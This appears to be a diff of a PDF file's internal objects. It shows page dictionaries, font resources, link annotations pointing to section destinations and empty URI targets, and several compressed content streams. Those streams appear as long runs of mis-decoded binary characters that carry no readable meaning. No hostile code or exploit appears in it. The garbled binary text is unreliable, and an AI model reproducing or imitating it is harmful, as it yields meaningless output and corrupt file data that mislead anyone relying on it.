fi8Ksæy>[í.>þÆfðœ1ŸçÙìÁŒÚÍx’Á5»¹øåâåíÅå›0˜å~ž„ÉìvMkD~ųÛböÑ‹üù"˹÷ª™G¡÷PW(æ‹(‹ç9ÍýÄÂødöh§€ù)ËÜN¯„K¡ä|Ç‘WÖ‹Ü5íå¹êtÙÔôجé_oíð+©…ÚWM©Ÿ)⨭¬ªU3_„™WØQË9<ô+šáe½!œÈñ º£]•«¶QÍZÏI”x7¿¼Ã9³…¶"? 3|#Û{Ô¾lQѹ2Æ€Š˜µ±b»kx¢Ü“Ôíªöÿnå¾zhËù"ð´Ôͽh—e=qÞ€¥~–ÄýLÝ´Òîµocð•,ºVÒA¶Rì¨k;fÙ}bQd o v¬ 4 R?ˆœ ½y£˜p6¢0ò£ã>±˜Y$ ôÛõ÷o/P½7,_0ÆO°2û‡‰pf07ÔC©·HqOtºÙ ]®èÅ«××Dy÷B) ;>kû!A˜ÜO#îN¤Oa©È‰sÓí÷XM àaì­›vÂ,°QœänVÑœgC»(õŒXBðœÁËò¾¬ÐA7’8R­D27À¬§ôm„q[Ý—Ï•€_Àxt „.HrŽ½”û<ê}q#µ:(-w;űÞ5VÍn‡¸60á,ðY”ŸÂäa †]mQHŽ½ªºB>/ Oìp@ó¢gn•å£c?†3ú®Ô­Ø³bŒ|§QhØ3õ¶uù¹C ¦ùW1° â©õƒæŒ-ý£~?löϲ.”ú¯èEÆ - N«ÜÎ!07wÈ•µ1 -¬r¢»²V÷Èm#cªÜÔS^²Da4ªSÓ QQ¶û'¤l²ÞKÁ4ͦ.u3euæGYouùEÉ!?íhaÄü,úà EÒ ý «G#ª¹E»‹âRÅe!+ÛE>0ˆÔÊM©tk•¶-ïQ…’"¨ ÌÉýˆ'! Âýœ¥ðA<µ¹¶ 3¹68æÚ$µq“k:þT¢[‡™ŸX½¨ÏÕNìé4+Q»ˆ†Â;ó7xDÚÈDnà­ÛfGT©ÕãÄ7M׮䃹vc×|SV–zÚ UíÅFN j ι÷ƒµD©l4F­ÞÏcpæ²K·^iE€7±'Ú²é¬â!TBðV/žBè>çÜè¥É#À9—ôI(ñé›ÿ”NÓÍüCa&œ¸!ðÉVèÞ§ .R:¬íH-‰#?@Õh%ý´cÐÉžö‹ß/ÞÄ ¿|&baì·vüs ÷M¦ûó‰öêõK·öÙÛˆbR,¹qû|gÎ@´–B÷­²kN -,_L…dƒb~ÈÌO·Pñؙª!øà"æzŒÒ5åíz%í6òkÓ›=ÉqhIý´>OeÛ[³-ìçb†¹ì@% ¼øs}¼±W•Ù1jàÃVögŠ ¬ö•i#<Ä^¬*¬Z¢VtíÎø@¥Á¥T9 àKDãÆÎe»k1Î’ÇbVåÔåWÌZ·¾ö{×Ï7¿+$¼véÌ^Hþí°yp÷¯nÅ7 <²À|}{ñ_ÍÇ£ -endstream -endobj -614 0 obj << -/Type /Page -/Contents 615 0 R -/Resources 613 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 566 0 R -/Annots [ 594 0 R 600 0 R 601 0 R 602 0 R 617 0 R 603 0 R 604 0 R 605 0 R 606 0 R 607 0 R 608 0 R 609 0 R 610 0 R ] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 634.343 412.999 646.296] +/A << /S /GoTo /D (subsubsection.5.16.3) >> >> endobj 594 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [145.067 719.742 189.943 731.695] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 618.057 173.013 626.911] +/A << /S /GoTo /D (subsubsection.5.16.4) >> +>> endobj +595 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 597.344 369.99 608.135] +/A << /S /GoTo /D (subsubsection.5.16.5) >> +>> endobj +596 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 580.504 173.013 589.358] +/A << /S /GoTo /D (subsubsection.5.16.6) >> +>> endobj +597 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 561.728 173.013 570.582] +/A << /S /GoTo /D (subsubsection.5.16.7) >> +>> endobj +598 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 531.055 197.445 541.86] +/A << /S /GoTo /D (section.6) >> +>> endobj +599 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 504.255 140.955 513.123] +/A << /S /GoTo /D (section.7) >> >> endobj 600 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [251.486 686.38 290.304 698.332] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [71.004 475.519 128.74 484.387] +/A << /S /GoTo /D (section.8) >> >> endobj 601 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [343.245 686.38 388.121 698.332] -/Subtype/Link/A<> +/Rect [172.983 289.633 206.931 300.424] +/Subtype/Link/A<> >> endobj 602 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [431.005 686.38 540.996 698.332] -/Subtype/Link/A<> ->> endobj -617 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 673.027 163.336 684.095] -/Subtype/Link/A<> +/Rect [353.926 262.375 402.494 273.166] +/Subtype/Link/A<> >> endobj 603 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [228.845 585.133 346.736 595.924] -/Subtype/Link/A<> +/Rect [161.681 202.712 261.605 213.503] +/Subtype/Link/A<> >> endobj 604 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 561.057 200.438 571.848] -/Subtype/Link/A<> +/Rect [189.412 189.083 232.629 199.874] +/Subtype/Link/A<> >> endobj 605 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 541.323 205.971 552.114] -/Subtype/Link/A<> +/Rect [283.682 175.455 325.515 186.245] +/Subtype/Link/A<> >> endobj 606 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 521.589 195.458 532.38] -/Subtype/Link/A<> +/Rect [138.435 114.311 225.172 125.101] +/Subtype/Link/A<> >> endobj 607 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 501.302 186.772 513.255] -/Subtype/Link/A<> +/Rect [175.786 92.712 242.796 103.502] +/Subtype/Link/A<> >> endobj 608 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 468.492 191.079 479.283] -/Subtype/Link/A<> ->> endobj -609 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 435.13 243.952 445.934] -/Subtype/Link/A<> ->> endobj -610 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [381.43 397.425 430.263 408.215] -/Subtype/Link/A<> ->> endobj -616 0 obj << -/D [614 0 R /XYZ 72 793.935 null] ->> endobj -66 0 obj << -/D [614 0 R /XYZ 72 639.806 null] +/Rect [197.449 71.113 267.89 81.903] +/Subtype/Link/A<> >> endobj 613 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F14 522 0 R /F20 418 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] +/D [611 0 R /XYZ 71 806.89 null] >> endobj -620 0 obj << -/Length 1695 -/Filter /FlateDecode ->> -stream -xÚWÛ’Ú8}ç+ü°UkªboܦŠfð²$LŒg/•Mm [oÀr$y.¿-K2xÆlòdÑ’ºOwŸîŽ‘Ž±è}ï¹ðu ×yÆhâØîdb$ÇÞ—¯Ž‘‚üƒáØÁdl<Õ§ŽF0Ã÷`lzŸ{7qïêÎs‰=zC#ÞI¾=ñFœ_ÌÀî[ãI`®ò ÷-웨HÅ"0ÒwͲï»æ Ía™íû¾gòþ×øÃÕ;8Ó ƶ€áZ«ë‰#=G¹`ûÁЇ-uÚ -|;& -Ißr]Ç9C2*$à Ñ0§ƒcXÞØúJ!û~8¢®FfÎÄwhR|ÀˆáTJ«"ÅTnð=–2Žé‘É%Ùö¤;" 4Séˆ=ãK}p LÑAž¾¯¶‡<‘N¾ÀÆc;(ê.Ä0H°u°ÏðJ·½±r\CßÖâÿ‡uƒihJÄ)×·‡ž -Î! Ë÷Í™-¿ û @Ú2Òí ‚¶À±‡R×@eî¡ ·T\ú‚º¡1†Ä ¡Í ì‰3‚ì Á€'•þqñfùÂ÷¤kñ©sj—/Rbíkßܱ=ö€NBÏxxžý+Ç«£ò#b\qrD\äHH6ŸWr‘ÿâ„çÚZM½˜)âh‹D…˜£o˜< -ÚÔ¿94áõ }i}Ïyy}u%AØŒT4Á;QL4ÃvköÂÜu¯•Ãòº …rø )BöU­¯Žäյܻ®÷&vàzmP–¸Yíàpìù&Û“'eJ2ŠŽ¿2ùó,ê“âwQ·Úc–‰ŸsÞ庵§"níñø œŸÙâû\™‘Û"ÄGÌjîü¤…G¹ÿ{ݬ7¡²ð;¦[Âr®"uÀøp-Õ;Ö@ -ÿvNŠw¨:p)pAâ¶b©Ò#ÈÊ@nϸ¶‚˜Z’Kk¢mHG±&Êšr1y)تS¬ÄI¾Ëqª¹¥Ä˜«ó{}°æSsª#Dæš®´YWô‰U(v”í.Ï­JxˆVM"á殂J]´«ø•Ú®,äöj¹‰áî=•‘P ±ˆÂ Gù㦢¥Šš¢Üx»IE[EÖúô³Î3ÉX§yu9 -??„›øn¹¢øn01W©¿ã{ZŠ¿WXgr×`AJp§Lî/ÖëÅ*œ¯£ßêa˜÷”$@i©{AHvPn§„~“+Š°P aD;¬mÇõ,Õ·n×Ÿî– å—0ªý -Út{ãMBŠ]žUZ èHªÆ—Ÿ–¯œµïÏÉÉ8]l1q'çá!Š6×+ö†æ5û_äùS· èºs[Èþw½›ÚÖÃ8I§ÃøýzÞ‡¶4 ¦Ü}§ÒÆmÞ¯7ñ…6²I|ÞKÚ}WŒé|ÏúV0Ýsø-­0Nó"k»Õô\4•OI/€Ž.bX !ßr<½]¯[†o¼»­wU‰×O'^©H”=.’Â%×Ê©ë_\•T¬³úññâ^rf¥™¨ìBX()-ho–¾½%0—YA¨Ò°Ín,xª‡Ñ‰ÛPN%O­NCÀ6jÁ€)øt¶?ÅÊŸSlÄY¦^Û¹UE›0ªumd ÖÐO­E¢0Ì$ÄàÇÖ´KàáñÇ¢x‡)¦Ó(¼ £0RöO&"¹ÿCo,¹Ç¦ïÃÙ<Œ6JQøÌ)j7I­FUtŸyÑ0µD’¼Dß[ü¥ÄÓYü×}ø¬Ø‡`ä :=¿DmÃSÁÝ –'j"Íó¬éÖº¼úêÕe»¥˜Óûhýç_j8<趌^“±<ÍÒŽf{z¥ð ¶A^±¥”×s÷¼®Ù ãXÕE«“¾ÆÕ©Ú!P‘Mã÷°Vsö#zÎÕñí“U>ÈDk*’ŠÒ¦ìN¶Ôø?KpÝe.=_u1|@/Óy¸šé`Ï…D·@Õç1XO™nðü c•oŒ’½Æ#(܆Ô]P> endobj -611 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [257.923 718.914 374.8 729.705] -/Subtype/Link/A<> +6 0 obj << +/D [611 0 R /XYZ 72 336.886 null] >> endobj -612 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [498.693 718.914 540.996 729.705] -/Subtype/Link/A<> ->> endobj -622 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [71.004 707.222 132.965 716.076] -/Subtype/Link/A<> ->> endobj -621 0 obj << -/D [619 0 R /XYZ 72 793.935 null] ->> endobj -70 0 obj << -/D [619 0 R /XYZ 72 760.449 null] ->> endobj -74 0 obj << -/D [619 0 R /XYZ 72 693.208 null] ->> endobj -618 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F20 418 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -625 0 obj << -/Length 1592 -/Filter /FlateDecode ->> -stream -xÚ½XYÚH~çWø‘‘bdžæðJ<Ìa¢¹)R6Ænƽ‹¸m&üû­¾ŒmØQ´û2€]]õÕõUõØÆ«aŸz?{|Ú†cLÆĵ-Çu0é}ÿa<ÿbØr§Æ—J 4žÂçÖXõ¾önüÞÇùÀ1\ËƆ¿:†–;~d|ï¬+sê¢þ ^ñÕÿËǹ3jÈ£ÑÔ²(äÒΉôl t)ÈŽ“5‘ƒ¬¡í—¡…+Îø1¦øÊ Fý,/I–Röõà O×òmEq$¾•™ø¤9Éf/äßbÆâyA‚K\ж|‰é•Ó/ÅMV|`h©é DC'/²‰¤Í°¢e–$ý ‡  2²ßfA$M©ÄgoB\0Ê¿Z(ÌxŒ…àgßÖ)0Í!˜*=¯ò@˜¥%N¥o1NU|Hú*¥èzK”ÍÕ×{ñ¥ãG‰Ã8%—Ÿ¶Ž²ÜéXà0s!è{+ÿùzyýàùÞòÊØ®Û÷1-ƒõ·ãÊŠ?í‘Má£sÍ4£uBgw7«+Mè<+B…9ÿ6±‚-dZYŒ‰,‘]°­°^FgOpn< ºG't#¨<\e?º§%NºfÁ-"“ql)Ëy7ä×ìyéÍß LcP¿Ð–Ž0-ä¥Ý²`´å-¹â§•Ï5;£É9Íð#ãåþ¯´‹w³•¿\<~’¨WB¾…$(A§j4’¶k³YŽu B]{)‰ô@ -üŠå³¥÷Éûö,,ù³ÿþnYXfž -Šc#WÅPìHa™Ø5ŠÁ͆¯õ2=ƒ"2óT<8†‡  cLÏ‚€àDêÅ{q˜®…œd‰¤iNBú—‘"M¼¿ÁäÀÌ¥¬Mr'á9öB’½~êi@©RV**½ÍR…sS×H§Ý¡à¶‘ d ƒo6`]¡¯çÌì¸8PIŒ•í¼×`;fëQ?›òVm%·_dï†ÿzê†ÆÑ)CyŒl:usnk»»¹>ÁH”_ù5@ÕÿQH¹>§bËJß²‚ÍNj\ »áœÐT_×Ä1?([Øô -²#[Xq©Œq (:¡þpH;£5N¦““n£:K'`‰fi:»:Õ‚çÅ})eÛ*á|2™ ߥPµ²8¯¿NV Ü&CÅ¿j”BÎEn ½PV|6œÔkÛ-GÓÔ-ŸéÓV,.Ú¸Szd¾º -Yeb=ÕêÌ—×õ›{‘ËÁ=¯YUÕ­º}z‡f‘¶3£Bç‹ÜVì ¼y;ÝÚP‡.„Ô"f ï -þ OÞ’:9dó†¡J4)mÞ)•IFÒõ¦øaåì~ñ°ðWþõÒ—»Ùœj k¬CYŶeˆÍtõ¦¹üÔ›ÆX–+[OÏÒáûà¬%Äkô]f6 ül¾X®üÛÏ×K¹Ê\r õ+BmÄp‚ëT¡5«ª£þw¢úôüÞ?ܵÈ -endstream -endobj -624 0 obj << -/Type /Page -/Contents 625 0 R -/Resources 623 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 627 0 R ->> endobj -626 0 obj << -/D [624 0 R /XYZ 72 793.935 null] ->> endobj -623 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> +610 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F20 501 0 R /F24 614 0 R /F22 546 0 R /F14 615 0 R >> /ProcSet [ /PDF /Text ] >> endobj 630 0 obj << -/Length 1449 +/Length 2537 /Filter /FlateDecode >> stream -xÚÝX[s¢H~÷Wð¶X58¢xa«|0Q3™11 fRSSóÐB£lšÐ ›¿§o  $Ù­Ú‡Ý'¤søÎw.}¾ît­Ñ5.ZO-ž]Ã6F=cäv;¶ë~Üúù«k°þÕèvwl„Ul8Ã1<‰áµn[gëÖçEÏ6ÜŽ;ì u(1ú·?0ÖñÓtÚÖØuÌ{†¶¸ýkýõóÂÙ;ƒq§ë °¶nÒê*j€=4Æ`;t¸­åØN§ßuáG¿ã8®üƲbùd9õÖç_¦wm«7ì9æÖÚÖ 70Ÿ -œ=ËŸ´hÛfžê/šò—¿CòsœÉלò§cf8Ï"¼¼e÷ }í–=K€Onïçw?Ú–=9¦w»” ,G9Žq’Ÿbn°|Çb¿ÈqÐŒÍv˜¶åŒà«›ŒÆ)'/?©bŠùŒ D{ïÝ‚µf"€¸Ëí8vÏ°zNÇ¥³{†3+Àa”`•°Hàc£%úX¼þ.PÈ1ãõ3噦ܒÉh}MP‡]0íE&rŸaH”2/XNãÒò5/IÊ6YGçM„2Òy+‚Ð’l!qÐÈæ¥zù8:k¨´,m&Þ—åå”»ë¸æ’úˆH€å;•‚P…¸SqÉå" d:²©‹ˆ¨\±g$ïcÆþüKdi®ƒ9ò-œ(Óåhƒ´ƒAØ΢¹k’UñI€3ò%[é!|]C¡'‹ÛNî—˹Ú[w°ªH«š•haFã7c˜]y§9šhm½Y”cIáAQàõ~àË'HÕ²Þ9ïyz2f¹ä2;JÇYC€hÃ(!g›¸âUu§.ü¡ -–šÚq•Â`ÉUýþŸ=IëBlhLÊ,?&+ïüjÖ¶ú6´Ä\NòãÜ€©c”4 ~ÀWsPÆrîpè¿é´Ò€:—é ‡=÷‡´È- -‰­ ÒuÀŸT0J3\ -)7V?¿_Ÿ7Go2L¨t}½JT2}ù2´ô-^«Õ™ž³o‘ù“ Ý"^NË‘ Î}™nÄ" %(¤|³Ðƒõ”ЄŸ«T­4‹öf¾ªï줋…Æ~«$J¯G{È$ìâ­>=0:¯Ý8ÚMÌB‹ïøÉ•·¸™®¿¼¥V‡Ö‘]áœo$&¢K‹ ÅNJòµ¯Z©'ßvpÒ!¤é$“Ç©d²¾º9br‡cZî9¯ð)1§’Q§Thf9Í”û Ê@Ý¡°¶Ù,¨QЃú"ÃÛˆåê¿;ÁŽBrÊ¥t+äTuÜ+ }#=X¥|HÑp -æð(à£Q¿FëàE¹Ä e^š}˜(_3LðûÎøªwÖèì&wó‹os8Ó÷ºpˆ|'E@‡ú>]êóCTIÏyÏM×Ó¿ú çÏ© ½þq3ÿgøáõvTy1¦4J0-š·ž¥œysÏ»\]ËS[íK­ ô`E¬ 9 -R×8~R­¯gÊ€ÁV-/;âDV›œlg•Æâž¹àk¯PŽÏu¥ZùE–U×A”mq^ï‡ak4æ-Á(FÏ'@Ž‰‘¿+¹¼Í–SΊQŒr¬’/øôZ‚2ÐÔpئ0ƒ&«ÕÅr~3½Ðp¯çÔ–Ò­-(eW€ðû);=ŽCVRìGaTJ)ÚªÃJRĸZEˆ;¡Pâ{õ"ОHŒÒzÍc¢1F}rUÍm]vG—ݧIm‹ U7ÝËëKÝMS#lPÎ+0÷úæ5Þk™FìñEÉùÿJ¨Õ§R0^T î¢\ -’kiÙ¡}D‹† ù£¤HÕ(<ço -9}\Ý 6ÕÜUy<®/ßîg ½7@´ª¡ ×ÜãÿÍèç|Ýú ŒÞs +xÚÅY[Û¶~ß_á·Èh¬ÕÕ’lš4M‘&Û®‚ƒ´(h‹¶Õè]vãþú37ʲW»]œ‡ô‰äC‡3ßÌHÎl7sfo.¾\¸Ð:3wy³(ql7If›ââÓïÎ,úO3Ç’xvG«ŠY°Œ¡Íg7¿\¼\]\þ๳ÄN–Þr¶Úò¾øál•Î>Y®=_ÄI`½-ç¾guM5_@›ö›.«Êùï«Ÿ.pðômǃˆ;ÄŽHjZ` F,‹ ˆm'ZBÇ·ƒ aÖß7:á>;{¾9ççÃÍ/ï^ÈrTE³üúæböiáû¾UϽØ:Ì®Õí«rQаý’§ë“cdµ}~ö‰Ä|øÂsm?ÿy?4j“ëG‚@FaAç~`m¾þÁ|ß^Þk¥j»]£Ÿ¤èˆå^ÔíaSÕ;ïÛK bfÝÓ4<˜DmL8ÿ ‘kÕ>AäA¹$nÑ‚À + âvâDÐƶëˆXo·s'pu|Öžu®Jîu·ªëÔÏû,cnîK¯…V×y¶Q„D º¥÷Y™2áýêÝϲ¶ïöºDîî„¥j¸í[-ì¥W+T-³ÔZ©êdrÛ—„B +Þ‹/ìÌ®o/½FB‡aÊóFŠ÷í8¿Xô5m;g¡í†ÃÂö.ë6xÔ¶uÙ+¢ÎK­SÍʶCSs×Êsfit‹w‰, òߢ‚uÓ‡ÇÜj  Öa^ÜöÀR ÷'à íÓÞ–S[ 0ÙºQM¦[±¢ T„vc;¤f«YûùaûÖs¸›[Ù[ÕYl„šq|K5š'š¾,³rÇó¾Ø'˜ƒ•Ár*”ñ®•=Ï÷*”ø-²Ýeíž{¤r‡UR=¢X|}øU«4ÏÊûh +³9]ÿ0Þ×3–͵Îõ0=awú<—ÕAh©ôv.ámð&Ú9°ª-O“½cgÐôWó8°®^ò`Su®Ùe_™&öYÛU$)²÷5;IÕtLÙjÕõ`oÌ••gçJ +ç^“uŽ·þp3š³§.ù¾"_LàN{Õ™žn…8vÐ e@"uP?¬–,gu"¹TÆ'ÐcL\êqÿZB"öá¡ËT5X<®jxiœ^fÛ +.ÑH—ª ¬vB í¡ítÑ4r‘ÿ¢gpب’;*oL*~3TÛ:‚'Ø1,¾Æ;ÿGm©oÉ(?zr]šoå–½kq= +.0†Iâïª&ëöE¶aÂXGUÉš¼ f®k'aè!‚bü@wiÒJPÑõÀ7º¤©„iœ‹Úž<¶‹\Ab½BLE éCAŠØØ-è[­ó*ëx ¸aCþÔå®ægSßCð"³Œaj¤‚†ÛΈB;p‡¬á?¨ç«.»‰sÂ¥íÃÒ= •–½‡3¡[:!bIÀÆ“%GHÎþ2´#𒓇#ÃPìée!§uØêV(¬‰b0;0ð oþ›ãûà* 8^‹Ð¯%§¢}§¢ámŸ—ëlHÌL~à±UÏn+™ÜV$*ø#u£;ÈGn%¨’-·TÉõ ¥S&œ•Ûª)$ßô½€±å$¬j[ãzÓ=Ts'-· „Ð9úntL~ŸÉžkE‚|^hrT @f©0±çQǨü´Ðœ 𕪠$<&óF€Í›¾æJð^æ!±¯FøÏ8X} ö•8ƒ xä 7󑙤†J2U‰Dã…“ï­ q²e†i s‘æª&OŸKìƒP‘±µ“„XcY;Õì´û&—|º}ñÀ7ð§ÜjD«ž@œ«ëê——nad tiÃc¸¾{ÉÑí²ÀÚïÎü#+;»Þ×ÿÎÒ¹N;YT]µm_èãm¾µœß]½õ +Ÿ.rvjð^¦T)ä $¢à‹ž¯…`—An'£R8Àrþ¹›{{s9)ÍÞ0f‘km›ªÀžÃ×CÒñzH†ëنÈP8_hU¶†G q(q@PŠL»qœb|žöÜÊ:nM‘>BS¤Ñ˲N2a^È+P扈Fv Ÿâ²T*9!Ÿ`ÆÃñ:ïÅYxçÄedL:<Š ×â8Ttú+>×Tt kÑv>ù´à'ãÜ%øƒÁÝ>ȧÅò,A 20ÀwµfÓ.¥q0YV¼üí«›Ë·×7Ïyd¨&K#¹A =9ÕÙé—xÄÒFsÜÍóçˆÕ>퇓Ç,å†ðÎÃV•P$ý5Ú“8%¹Æ FÁ8âÑ“—‡ŽÃŽ‹ùpõS³@låEkFpà7gAl"0mÁö7UÞtªã`E‰Ä¸š à,èeô`aA`ezggØë˜#蜘S%É3‚V{‚µØ³L+5À—>Ãr)PN´%ôáÙBÅÙs =E•R¾ ‚ox‹MÅz8ª66c%ô­Ìq…âY™p¦\ùi‘³¬ ]Ë£ùöeDfeAg-ßçS/§MA$Á&B”☂È5ÎR²Ü† +,=JîÊÁãWŠÏ_ PTìÀÜ Î€/W宇_†âw)Ù²vT¤›n¦®³ae¥šR­Ò½é“aEžª"Á:[ДÏÀñÁ(š7øˆ™*] W'×Â902^ãÿ(þ4î·éîÕâ0 ÉUÖÀaöò×áÙ[H)oÖü´x×s×u­«›kf_Ñ'†z4Ðgõκo8©Ä;¸½è w?o'²jÍÂÇ” Š + 쉫7#£„d†ŒÎM§PúÑ›põÉ8 ˆˆšFI ’bZ‘ÑáNY·çÏ™, †P+Ù°@Áô眗‚svQ•´”2@§•Oý— 9¯!I?È*ܬ¬=/~cÏBwøðúÝëïWÓµiuô@ãöª‰3–‘ÄC];ʤ&ÎYº6žCmŠv–ù¶>E}ű‹¹>¢]®š±z†¿ÿ@æáœeÛ*Ϲ–jþVaãK¯›V½ÏÍ1^P·ºO¥Ê¹þñÚ”ÓÙçëÕÅÿâ:{¡ endstream endobj 629 0 obj << @@ -2263,683 +1716,678 @@ endobj /Contents 630 0 R /Resources 628 0 R /MediaBox [0 0 595.276 841.89] -/Parent 627 0 R +/Parent 504 0 R +/Annots [ 609 0 R 616 0 R 617 0 R 618 0 R 619 0 R 620 0 R 621 0 R 622 0 R 623 0 R 624 0 R 625 0 R 626 0 R 627 0 R ] +>> endobj +609 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [135.89 747.553 207.936 758.344] +/Subtype/Link/A<> +>> endobj +616 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [131.352 725.826 212.777 736.999] +/Subtype/Link/A<> +>> endobj +617 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [154.095 704.863 229.461 715.654] +/Subtype/Link/A<> +>> endobj +618 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [133.676 683.518 207.936 694.309] +/Subtype/Link/A<> +>> endobj +619 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [132.763 662.173 203.204 672.963] +/Subtype/Link/A<> +>> endobj +620 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [293.144 619.886 349.088 631.839] +/Subtype/Link/A<> +>> endobj +621 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [369.782 619.886 420.248 631.839] +/Subtype/Link/A<> +>> endobj +622 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [399.391 601.663 451.185 612.454] +/Subtype/Link/A<> +>> endobj +623 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [389.246 574.405 425.574 585.196] +/Subtype/Link/A<> +>> endobj +624 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [203.419 542 230.783 552.791] +/Subtype/Link/A<> +>> endobj +625 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [184.175 127.868 361.226 138.659] +/Subtype/Link/A<> +>> endobj +626 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [462.362 127.868 540.996 138.659] +/Subtype/Link/A<> +>> endobj +627 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [208.398 114.239 271.082 125.03] +/Subtype/Link/A<> >> endobj 631 0 obj << -/D [629 0 R /XYZ 72 793.935 null] +/D [629 0 R /XYZ 71 806.89 null] +>> endobj +10 0 obj << +/D [629 0 R /XYZ 72 529.168 null] +>> endobj +14 0 obj << +/D [629 0 R /XYZ 72 503.625 null] >> endobj 628 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> +/Font << /F21 503 0 R /F15 499 0 R /F14 615 0 R /F22 546 0 R /F24 614 0 R /F26 632 0 R >> /ProcSet [ /PDF /Text ] >> endobj -634 0 obj << -/Length 1585 -/Filter /FlateDecode ->> -stream -xÚÝXëoÛ6ÿî¿B(TjZ¢Þº¡EÓú\Ým@ ŠL[\õŠHÅõþú’ìZN2'Y‡} éÓñ~?wÇXÆÊ°Œ£‹‘ £eØF€ ²EF’NÏ,cò׆…Ü(4ÖR+7\?„13>>ŽžÎGÓçØ6"ùØ7æKeÃA‘ãó…qjzh< #×üÌâŸÍ_OŸÛÞ–¾ë…ÈrÁ Ô¶=¡2²45°í¶"ÏÃBy¢µ'®ƒ\7jìñĶ±g¾oxÕðñÄ <órì`“ÔðÅ<‰m–Œò1Œ›–1ÁÂV¨,¾¯8-‹™RÄxKÑ ƒ–íärÀÖDëLìA 4‡°&8&ÆÐ5K‰ÃÄÇLâBM„Rhõ£ad¡”y©$Œp5á©6s9úµZ'· ãF)eD}Í4âR‰Kí)1Ï gÃà \P§¤Öàä+e\-dtl›_Õ¼³¹µD-XeÜd\xEøÔvÀÚ§[Dì›”iïnÇŽƒ‘çuÞµœ¢(è‚…ÊÖ:¥‰°jÓŲ¬óX¸ö‘æZ|ë‚+&EÂ]uY3µ .jÂë8!ç±4öEüÝò,ºlµgÅyf’45¨Øš Íäþ¼þ…˜¥¥X¸.„¿\l¾é|1àƒC vNÀ×9¡µ-ýió(°±ö½¾!qÆÛ(€:oVbvÇ.béC †9Ù¶Æ:Hg“Ùûœ$R¿l„„ìå|þAÉjrÑÆo+Nxx0÷:îÑH9¯fÓ©`dûCÐØ ìØS&Ló L¦à?hÁQ•V?ÑÅcû¶ª—jj·Y»( -õž¦é,Ïg^x¦”N_½{KÞëŸ ƒ”§¦§i™“)-.ÊZlô²ìÐÜ 9@þ|¨ÖÆLŒP”T —4#]¢ÇÎ(q¸ë)ˆÔ‚$¼³)jœ’¥M -tÜÈÍÔÙmñD"—ÂÖ¾°))ÓÉãóŒ> endobj -635 0 obj << -/D [633 0 R /XYZ 72 793.935 null] ->> endobj -78 0 obj << -/D [633 0 R /XYZ 72 760.449 null] ->> endobj -632 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F24 512 0 R /F22 421 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -638 0 obj << -/Length 1266 -/Filter /FlateDecode ->> -stream -xÚåWÛnã6}÷W‹.â¤u¿¹H‹\ìÄ‹\v7P ŠÌXÜÕÍÄýúEʲc9õºÉKóR“áœCÎ!g¬JcI•NZ“–£*i’£KŽ§"Íó¤ 